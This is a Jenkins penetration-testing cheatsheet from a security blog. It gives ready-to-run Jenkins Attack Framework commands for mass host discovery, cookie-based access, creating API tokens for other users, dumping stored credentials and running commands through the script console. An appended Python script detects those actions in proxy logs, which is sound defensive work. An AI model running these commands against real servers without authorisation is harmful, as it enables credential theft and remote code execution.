Jenkins Penetration Test Cheatsheet
2024-12-23 13:27:0 Author: www.hackingdream.net

Setting up Test Environment 

sudo wget -O /usr/share/keyrings/jenkins-keyring.asc \
  https://pkg.jenkins.io/debian/jenkins.io-2023.key
echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]" \
  https://pkg.jenkins.io/debian binary/ | sudo tee \
  /etc/apt/sources.list.d/jenkins.list > /dev/null
sudo apt-get update
sudo apt-get install jenkins

sudo apt install openjdk-11-jdk

#Admin password
cat  /var/lib/jenkins/secrets/initialAdminPassword

#Access the server or use the server ip address 
http://127.0.0.1:8080 

Jenkins Scanner 

# Used to find Jenkins Instances over the internet/Intranet - Mass Host Discovery
#Download JenkinsScanner.sh from JenkinsVulnFinder

#Start the scan; accessible Jenkins instances are saved to the given output file
./JenkinsScanner.sh -i ip_list.txt -p 80,443,8443,8080,8010,8090,8085 -o jenkins_instances.txt

Jenkins Attack Framework

#Installation
git clone git@github.com:Accenture/jenkins-attack-framework.git
cd jenkins-attack-framework
chmod +x jaf
sudo ./jaf --install
./jaf --install

#Check access; if creds are not provided, it tries anonymous access
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a User:user

#Auth check via Cookie - Append Cookie | Crumb headers as below (crumb is optional sometimes)
#This is useful when only SSO is allowed 
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a "JSESSIONID.b56cceb4=node01gv13h0gw8msto7tpp82pv499.node0|crumb=74366885010b4471c265872d42bcf5767773698bab0b49dc09d48dd8bfa0725e"

# View console output for the last build of every job that the user can see
python jaf.py ConsoleOutput  -s http://172.19.107.32:8080/ -a User:user

#Create an API token (needs privileges)
python jaf.py CreateAPIToken  -s http://172.19.107.32:8080/ -a User:user

#Create an API Token on behalf of user `Bhanu`
python jaf.py CreateAPIToken  -s http://172.19.107.32:8080/ -a User:user --User Bhanu

# Dump creds; requires administrative credentials with /script access.
python jaf.py DumpCreds -s http://172.19.107.32:8080/ -a Bhanu:Bhanu

# List API tokens for a given user; requires administrative credentials with /script access.
python jaf.py ListAPITokens  -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User

#List jobs 
python jaf.py ListJobs -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User

# Run any command; requires administrative credentials with /script access.
python jaf.py RunCommand  whoami -s http://172.19.107.32:8080/ -a Bhanu:Bhanu
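
Added example, not from the original post or the Jenkins Attack Framework project: a defender-side check that flags requests to the script console (/script, plus Jenkins' /scriptText) and to the Jenkins endpoint that issues new API tokens, the actions the commands above depend on. It assumes a reverse proxy in front of Jenkins writing Combined Log Format; the log lines, users and the names classify/scan are constructed for illustration.

```python
import re

# Combined Log Format as written by a reverse proxy in front of Jenkins (assumption).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Jenkins endpoints behind the script-console and API-token actions listed above.
RULES = {
    "script-console": re.compile(r'(?<!/job)/script(?:Text)?/?(?:\?|$)'),
    "api-token-create": re.compile(
        r'/descriptorByName/jenkins\.security\.ApiTokenProperty/generateNewToken'),
}

def classify(line):
    """Return a finding dict for a log line that hits a watched endpoint, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    for rule, pattern in RULES.items():
        if pattern.search(m["path"]):
            status = int(m["status"])
            # Only a state-changing request that the server accepted counts as executed.
            if m["method"] == "POST" and status < 400:
                outcome = "executed"
            elif status in (401, 403):
                outcome = "denied"
            else:
                outcome = "viewed"
            return {"rule": rule, "ip": m["ip"], "user": m["user"],
                    "method": m["method"], "status": status, "outcome": outcome}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, made-up users).
SAMPLE_LOG = [
    '192.0.2.10 - alice [23/Dec/2024:13:01:02 +0000] "GET /job/build-app/lastBuild/consoleText HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Dec/2024:13:02:10 +0000] "GET /script HTTP/1.1" 403 612',
    '198.51.100.7 - svc-ci [23/Dec/2024:13:03:44 +0000] "POST /scriptText HTTP/1.1" 200 48',
    '198.51.100.7 - svc-ci [23/Dec/2024:13:04:05 +0000] "POST /user/svc-ci/descriptorByName/jenkins.security.ApiTokenProperty/generateNewToken HTTP/1.1" 200 131',
    '192.0.2.10 - alice [23/Dec/2024:13:05:00 +0000] "GET /job/script/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The user field is only populated when the proxy sees HTTP basic auth (password or API token); cookie-authenticated sessions show "-" and have to be correlated by source IP and time.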



Source: https://www.hackingdream.net/2024/12/jenkins-penetration-test-cheatsheet.html